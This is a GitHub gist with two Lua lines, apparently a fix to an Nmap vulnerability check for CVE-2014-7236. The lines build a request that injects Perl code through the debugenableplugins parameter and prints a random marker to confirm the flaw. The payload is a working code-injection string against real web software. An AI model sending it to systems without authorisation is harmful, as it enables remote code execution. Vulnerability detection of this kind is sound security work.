Skip to content

Instantly share code, notes, and snippets.

@h4ck3rk3y
Last active August 29, 2015 14:17
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save h4ck3rk3y/b4bb278e49276e853a37 to your computer and use it in GitHub Desktop.
Save h4ck3rk3y/b4bb278e49276e853a37 to your computer and use it in GitHub Desktop.
corrections in http-vuln-cve2014-7236
local payload = '/'.. path .. '/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\\r\\n\\r\\n'..rand..'!")%3bexit'
payload = payload:gsub('//','/')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment